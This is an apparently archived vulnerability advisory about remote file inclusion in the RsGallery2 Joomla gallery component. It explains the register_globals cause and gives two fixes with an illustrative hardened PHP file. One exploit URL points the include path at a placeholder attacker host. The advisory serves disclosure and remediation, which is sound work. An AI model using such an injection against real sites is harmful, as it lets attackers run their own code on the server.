RsGallery2 < 1.11.2 - 'rsgallery.html.php' File Inclusion

EDB-ID: 1959
Platform: PHP
Date: 2006-06-28

RsGallery2 for Joomla
---------------------------------------------------------------------------

Discovered: marriottvn
Remote : Yes
Level : High

---------------------------------------------------------------------------
Affected software description :

Application : RsGallery2
Version     : 1.11.2 (latest at the time of writing)
Description : gallery component for Joomla
URL         : http://rsdev.nl

----------------------------------------------------------------------------

Vulnerable file :

rsgallery2.html.php

(Note: the title and the exploit URL below spell the filename rsgallery.html.php; check the actual name of the file inside components/com_rsgallery2/ on the target install before testing.)

----------------------------------------------------------------------------

Exploit:

http://[sitepath]/[joomlapath]/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://[attacker]

----------------------------------------------------------------------------

Fix:

The file uses $mosConfig_absolute_path in an include without ever declaring it, so with register_globals enabled the query string supplies the value and a remote URL is included (PHP's allow_url_fopen/allow_url_include permitting). Either:

1. Declare the variable $mosConfig_absolute_path in the file before it is used, so a request-supplied value cannot reach the include.

or

2. Add at the top of the file:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

so the file cannot be requested directly (the Joomla/Mambo front controller defines _VALID_MOS before loading any component).
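As an added illustration, not RsGallery2's own source, the hypothetical component file below shows the register_globals include pattern this advisory describes, with both fixes applied together and a defence-in-depth check on the resulting path. The included filename rsgallery2.php and the helper rsg_safe_include_base are assumptions made for the example.

```php
<?php
// Added example, not code from RsGallery2. Imagine this is
// components/com_rsgallery2/rsgallery2.html.php in a Joomla 1.0 install.

// --- Vulnerable pattern (hypothetical reconstruction) ---
// With register_globals=On, a request such as
//   rsgallery2.html.php?mosConfig_absolute_path=http://[attacker]
// creates $mosConfig_absolute_path before this line runs, so PHP fetches
// and executes http://[attacker]/components/com_rsgallery2/rsgallery2.php
// when allow_url_fopen / allow_url_include permit remote includes.
//
// require_once( $mosConfig_absolute_path . '/components/com_rsgallery2/rsgallery2.php' );

// --- Fix 2 from the advisory: refuse direct access ---
// index.php defines _VALID_MOS before loading any component, so a direct
// request to this file dies here, before any include is reached.
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

// --- Fix 1 from the advisory: declare the variable yourself ---
// Derive the site root from this file's own location. The assignment runs
// after register_globals has populated the request variables, so it
// overwrites any attacker-supplied value.
$mosConfig_absolute_path = dirname( dirname( dirname( __FILE__ ) ) );

// Defence in depth (assumed helper, not from the component): reject a URL
// scheme or any path that resolves outside the site root before it is used
// as an include base.
function rsg_safe_include_base( $path ) {
    $root = dirname( dirname( dirname( __FILE__ ) ) );
    if ( preg_match( '#^[a-z][a-z0-9+.-]*://#i', $path ) ) {
        die( 'Remote include paths are not allowed.' );
    }
    $real = realpath( $path );
    if ( $real === false || strpos( $real, $root ) !== 0 ) {
        die( 'Invalid include base.' );
    }
    return $real;
}

require_once( rsg_safe_include_base( $mosConfig_absolute_path ) . '/components/com_rsgallery2/rsgallery2.php' );
```

Either fix on its own closes the reported hole; the _VALID_MOS guard also stops any other direct-request trick against the file, while declaring the variable from __FILE__ removes the dependence on register_globals being off.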

----------------------------------------------------------------------------

Contact:

Nick: marriottvn
E-mail: i_love_lonely_girl[at]yahoo.com
Web: http://vnsecurity.com

Greetz to: VnRekcah

# milw0rm.com [2006-06-28]